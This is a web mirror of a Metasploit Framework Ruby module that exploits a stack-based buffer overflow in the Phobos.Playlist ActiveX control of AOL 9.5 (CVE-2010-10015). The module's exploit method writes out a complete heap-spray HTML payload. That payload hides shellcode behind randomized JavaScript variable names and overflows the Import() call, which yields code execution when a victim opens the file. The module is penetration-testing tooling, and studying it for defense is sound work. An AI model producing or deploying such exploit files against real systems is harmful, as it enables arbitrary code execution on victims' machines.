Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/aol_phobos_bof.rb
24575 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
##

7
# aol_phobos_bof.rb

8
#

9
# AOL 9.5 Phobos.Playlist 'Import()' Stack-based Buffer Overflow exploit for the Metasploit Framework

10
#

11
# Tested successfully on the following platforms:

12
#  - AOL 9.5 (Revision 4337.155) on Internet Explorer 7, Windows XP SP3

13
#

14
# Phobos.dll version tested:

15
# File Version: 9.5.0.1

16
# ClassID: A105BD70-BF56-4D10-BC91-41C88321F47C

17
# RegKey Safe for Script: False

18
# RegKey Safe for Init: False

19
# Implements IObjectSafety: False

20
# KillBitSet: False

21
#

22
# Due to the safe for initialization and safe for scripting settings of this ActiveX control,

23
# exploitation is possible only from Local Machine Zone, which means the victim must run the

24
# generated exploit file locally.

25
#

26
# Trancer

27
# http://www.rec-sec.com

28
##

29


30
class MetasploitModule < Msf::Exploit::Remote

31
  Rank = AverageRanking

32


33
  include Msf::Exploit::FILEFORMAT

34


35
  def initialize(info = {})

36
    super(

37
      update_info(

38
        info,

39
        'Name' => 'AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow',

40
        'Description' => %q{

41
          This module exploits a stack-based buffer overflow within Phobos.dll of AOL 9.5.

42
          By setting an overly long value to 'Import()', an attacker can overrun a buffer

43
          and execute arbitrary code.

44


45
          NOTE: This ActiveX control is NOT marked safe for scripting or initialization.

46
        },

47
        'License' => MSF_LICENSE,

48
        'Author' => [

49
          'Trancer <mtrancer[at]gmail.com>'

50
        ],

51
        'References' => [

52
          [ 'CVE', '2010-10015' ],

53
          [ 'OSVDB', '61964'],

54
          [ 'EDB', '11204' ],

55
          [ 'URL', 'http://www.rec-sec.com/2010/01/25/aol-playlist-class-buffer-overflow/' ],

56
        ],

57
        'DefaultOptions' => {

58
          'EXITFUNC' => 'process',

59
          'DisablePayloadHandler' => true

60
        },

61
        'Payload' => {

62
          'Space' => 1024,

63
          'BadChars' => "\x00\x09\x0a\x0d'\\",

64
          'StackAdjustment' => -3500,

65
        },

66
        'Platform' => 'win',

67
        'Targets' => [

68
          [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C, 'Offset' => 1000 } ]

69
        ],

70
        'DisclosureDate' => '2010-01-20',

71
        'DefaultTarget' => 0,

72
        'Notes' => {

73
          'Reliability' => UNKNOWN_RELIABILITY,

74
          'Stability' => UNKNOWN_STABILITY,

75
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

76
        }

77
      )

78
    )

79


80
    register_options(

81
      [

82
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),

83
      ]

84
    )

85
  end

86


87
  def exploit

88
    # Encode the shellcode

89
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

90


91
    # Setup exploit buffers

92
    nops = Rex::Text.to_unescape([target.ret].pack('V'))

93
    ret = Rex::Text.uri_encode([target.ret].pack('L'))

94
    blocksize = 0x40000

95
    fillto = 500

96
    offset = target['Offset']

97


98
    # Randomize the javascript variable names

99
    phobos = rand_text_alpha(rand(100) + 1)

100
    j_shellcode = rand_text_alpha(rand(100) + 1)

101
    j_nops = rand_text_alpha(rand(100) + 1)

102
    j_ret = rand_text_alpha(rand(100) + 1)

103
    j_headersize = rand_text_alpha(rand(100) + 1)

104
    j_slackspace = rand_text_alpha(rand(100) + 1)

105
    j_fillblock = rand_text_alpha(rand(100) + 1)

106
    j_block = rand_text_alpha(rand(100) + 1)

107
    j_memory = rand_text_alpha(rand(100) + 1)

108
    j_counter = rand_text_alpha(rand(30) + 2)

109
    j_bla = rand_text_alpha(rand(8) + 4)

110


111
    html = %Q|<html>

112
<object classid='clsid:A105BD70-BF56-4D10-BC91-41C88321F47C' id='#{phobos}'></object>

113
<script>

114
#{j_shellcode}=unescape('#{shellcode}');

115
#{j_nops}=unescape('#{nops}');

116
#{j_headersize}=20;

117
#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;

118
while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};

119
#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});

120
#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});

121
while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};

122
#{j_memory}=new Array();

123
for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};

124


125
var #{j_ret}='';

126
for(#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++)#{j_ret}+=unescape('#{ret}');

127
#{phobos}.Import(#{j_ret},'#{j_bla}','True','True');

128
</script>

129
</html>|

130


131
    print_status("Creating '#{datastore['FILENAME']}' file ...")

132


133
    file_create(html)

134
  end

135
end

136


137